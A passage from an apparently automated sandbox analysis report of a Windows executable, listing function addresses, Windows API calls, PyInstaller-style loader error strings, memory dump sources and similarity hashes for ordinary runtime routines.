                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            • Opcode ID: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                            • Instruction ID: ac726ab56367649f5b1581805bb664266390cd2fe3c8e3557ff30fb7d4033ed4
                                                            • Opcode Fuzzy Hash: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                            • Instruction Fuzzy Hash: AA31EA25B1A70294EF51BB4AA841275A3D4BF76BA8F9A0535DF1D0775CEF7CE0408324
                                                            Function 00007FF7B10F7420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7B10F8BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7B10F79A1,00000000,?,00000000,00000000,?,00007FF7B10F153F), ref: 00007FF7B10F747F
                                                              • Part of subcall function 00007FF7B10F2B10: MessageBoxW.USER32 ref: 00007FF7B10F2BE5
                                                            Strings
                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7B10F7456
                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7B10F74DA
                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7B10F7493
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                            • API String ID: 1662231829-3498232454
                                                            • Opcode ID: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                            • Instruction ID: 2abefd0bfeb127b0398a5a66573fee3d75a3394533be1d8339459a9add21f1f8
                                                            • Opcode Fuzzy Hash: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                            • Instruction Fuzzy Hash: D031B711F1D68740FB20F729A9963BDD351AFBA788FC40431DB4E4279EEEACE1048621
                                                            Function 00007FF7B10F8BD0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                            • API String ID: 3723044601-876015163
                                                            • Opcode ID: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                            • Instruction ID: dcae257f020d44c82feed7881d733f89881859264deaa871f546144673fd5396
                                                            • Opcode Fuzzy Hash: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                            • Instruction Fuzzy Hash: A0219122B0DA4681EB50EB2EF441169E361FB967C8F984532DB4C83B6DEF6CD5518710
                                                            Function 00007FF7B110BCF0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                            • Instruction ID: 78ea157534c40b25d019f34921f4f0b668a7404d0ff4eac36ece72ee0b13b328
                                                            • Opcode Fuzzy Hash: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                            • Instruction Fuzzy Hash: 8F217F18E0C54B82F7587329765A17CE353CF667ACFA08734EA3D466CEDEACA4008725
                                                            Function 00007FF7B1118B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            • Opcode ID: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                            • Instruction ID: 449e4c0a9cadb964474c7dbaea9218908cc96d60158f42a2a5981e1867ba0f25
                                                            • Opcode Fuzzy Hash: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                            • Instruction Fuzzy Hash: 3F11B421A18A49C6E350AB5AF844725F3A0FBA9FE8F444234DF1D83798CFBCD5648754
                                                            Function 00007FF7B110BE68 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BE77
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEAD
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEDA
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEEB
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEFC
                                                            • SetLastError.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BF17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                            • Instruction ID: 7f133a7e85d11f4a774f342d3bc1cb79706803d6f770235ad044ee935651501e
                                                            • Opcode Fuzzy Hash: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                            • Instruction Fuzzy Hash: 88117114E0C64B42F7547329765A139E352CF677A8FE08734EB2E466CEDEBCA8018724
                                                            Function 00007FF7B10F25E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                            • String ID: Unhandled exception in script
                                                            • API String ID: 3081866767-2699770090
                                                            • Opcode ID: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                            • Instruction ID: 68c807f15a37800ecf2e6a3cf97591f5b95212f6070f22340a7366f9710aa4e2
                                                            • Opcode Fuzzy Hash: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                            • Instruction Fuzzy Hash: 75316D72A08A8685EB20EF29F8552F9A360FF9A788F800135EB4D87B59DF7CD115C710
                                                            Function 00007FF7B10F29C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F8560: GetLastError.KERNEL32(00000000,00007FF7B10F2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F8587
                                                              • Part of subcall function 00007FF7B10F8560: FormatMessageW.KERNEL32 ref: 00007FF7B10F85B6
                                                              • Part of subcall function 00007FF7B10F8BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                            • MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            • MessageBoxA.USER32 ref: 00007FF7B10F2AEC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 2806210788-2410924014
                                                            • Opcode ID: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                            • Instruction ID: 0cbd9a785dbfeee971ed0378cea1b640b2669c92a6a6657b742f2e2466114449
                                                            • Opcode Fuzzy Hash: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                            • Instruction Fuzzy Hash: AF31A47262868681E730EB18F4916EAE364FF95B88FC04036E78D02A9DDF7CD605CB50
                                                            Function 00007FF7B110A5F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                            • Instruction ID: 4ad81b8345129264dd89ac7a52606832465d3cfbf15abe199c565ccc946c1fb3
                                                            • Opcode Fuzzy Hash: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                            • Instruction Fuzzy Hash: E4F04461B1960A81EB14AB29F848335E330EF9B769FD50235C76E461E8DFACD1548760
                                                            Function 00007FF7B111A220 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                            • Instruction ID: 392c708e0bcbf3abad28cafb7feb2014b092dccbd7f2b511dfdb7695cfd31455
                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                            • Instruction Fuzzy Hash: 21112626E0EAEF01FB54309CF0613B4E9406F77328F870630FB6E466DE8EAD58A00120
                                                            Function 00007FF7B110BF30 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BF4F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BF6E
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BF96
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BFA7
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BFB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                            • Instruction ID: 4a3ce8eb9aaab0b10e90f8dcf0178cd6c5d40447aa9186e4078aaad9b7db18f1
                                                            • Opcode Fuzzy Hash: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                            • Instruction Fuzzy Hash: D511A754E0C60B41F7587329B55A1359343CF663A8FE48334EA3D476CECEACA4018625
                                                            Function 00007FF7B110BDC4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                            • Instruction ID: d5bcbb880f9053a1fd17ccb45c51d50fac8e436428034ee5912daf74a12eb0cb
                                                            • Opcode Fuzzy Hash: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                            • Instruction Fuzzy Hash: D4111958E0820F42FB687329745A579A342CF67368EF48734EB3D452DADDACB8018625
                                                            Function 00007FF7B1106A94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: verbose
                                                            • API String ID: 3215553584-579935070
                                                            • Opcode ID: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                            • Instruction ID: e0b93580a5207de1f888e66c4309c9a80b8c2142710a683fff3858e39b9eb9ed
                                                            • Opcode Fuzzy Hash: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                            • Instruction Fuzzy Hash: 2091C522E08A4E81E720AE29E45837DB790EB66B5CFE44135DB8D473C9DEBCE445C320
                                                            Function 00007FF7B1110B88 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                            • Instruction ID: b3d25d7332575b5bdf29934f01a4446e3c8fd03c7341bbe1ee36c1e21865b7c4
                                                            • Opcode Fuzzy Hash: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                            • Instruction Fuzzy Hash: B681C635D0820A85FB646F1DA15227CF6A8AB33B4CFD74031CB0D9769DDAADF5218721
                                                            Function 00007FF7B10FCD70 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 2395640692-1018135373
                                                            • Opcode ID: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                            • Instruction ID: 7d5529c6e0d2cc9411fa3495316e893971aa6a7ef6b1477eb5cca3128afbd7ba
                                                            • Opcode Fuzzy Hash: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                            • Instruction Fuzzy Hash: 4A51B032A196028ADB14EF19E586A3CA791EB65B8CF858131EB4D4378CDFBCE845C710
                                                            Function 00007FF7B10FF5F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
